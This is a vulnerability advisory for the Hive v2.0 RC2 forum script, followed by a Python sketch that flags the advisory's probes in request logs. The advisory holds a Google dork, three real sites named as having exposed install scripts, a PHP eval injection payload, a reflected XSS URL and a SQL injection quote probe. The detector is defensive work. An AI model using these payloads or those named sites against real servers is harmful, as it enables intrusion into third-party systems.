| # Title     : Hive v2.0 RC2 Multi Vulnerability
| # Author    : indoushka
| # email     : indoushka4ever@gmail.com
| # Dork      : "Powered by DigitalHive"
| # Tested on : Windows 8.1 Français V.(Pro)
| # Bug       : Stop Script
| # Download  : http://www.digitalhive.com
=======================================

Stop Script working :

monocircus.free.fr/Forum/install/install.php?var=finish
sgdf.rodez.free.fr/forum/index.php
espace-associatif.org/forum/install/install.php

PHP code injection :

Vulnerability description

This script is vulnerable to PHP code injection. PHP code injection is a vulnerability that allows an attacker to inject custom code into the server-side scripting engine. It occurs when an attacker can control all or part of an input string that is fed into an eval() function call. eval() will execute its argument as code.

This vulnerability affects /hive/install/install.php.

Attack details

URL encoded POST input base was set to ${@print(md5(test))}

Possible execution result: 63c19a6da79816b21429e5bb262daed8

XSS :

http://localhost//hive/base.php?mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php

SQL injection :

This vulnerability affects /hive/base.php.

Attack details

URL encoded POST input location was set to 1'"

Error message found: supplied argument is not a valid MySQL result

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n *
========================
Greetz :
Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friends :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir)
SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------
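
For defenders running Hive, the three probes quoted in the advisory above can be screened for in captured request/response pairs. This Python sketch is an added example, not part of the original advisory or of Hive itself: the function name `screen`, the finding labels and the sample records are constructed, and only the paths, parameter names, probe strings and MySQL error text come from the advisory.

```python
import re
from urllib.parse import parse_qsl

# Patterns derived from the probes quoted in the advisory.
PHP_EXPR = re.compile(r"\$\{.+?\}")                     # ${...} PHP expression syntax
ATTR_BREAKOUT = re.compile(r"[\"']\s*on\w+\s*=", re.I)  # quote, then an event handler
SQL_ERROR = "supplied argument is not a valid MySQL result"  # error text from the advisory

def screen(path, raw_params, response_body=""):
    """Return sorted finding labels for one request/response pair.

    raw_params is the URL-encoded query string or POST body.
    """
    findings = set()
    # parse_qsl URL-decodes every name and value before matching.
    for name, value in parse_qsl(raw_params, keep_blank_values=True):
        if path.endswith("/install/install.php") and PHP_EXPR.search(value):
            findings.add("php-code-injection-probe")
        if path.endswith("/base.php"):
            if name == "mt" and ATTR_BREAKOUT.search(value):
                findings.add("xss-attribute-breakout")
            # A quote alone can be legitimate input; require the leaked
            # MySQL error in the response before flagging.
            if (name == "location" and re.search(r"['\"]", value)
                    and SQL_ERROR in response_body):
                findings.add("sql-error-after-quote")
    return sorted(findings)

# Constructed sample records: (path, url-encoded params, response body).
SAMPLES = [
    ("/hive/install/install.php", "base=%24%7B%40print%28md5%28test%29%29%7D", ""),
    ("/hive/base.php",
     "mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php", ""),
    ("/hive/base.php", "location=1%27%22",
     "Warning: supplied argument is not a valid MySQL result resource"),
    # Benign: apostrophe in a place name, no SQL error in the response.
    ("/hive/base.php", "mt=1&page=membres.php&location=L%27Isle", "<html>ok</html>"),
]

if __name__ == "__main__":
    for path, params, body in SAMPLES:
        print(path, screen(path, params, body))
```

A hit on `/install/install.php` after deployment also indicates the installer was left reachable, which is the condition the advisory's first finding depends on.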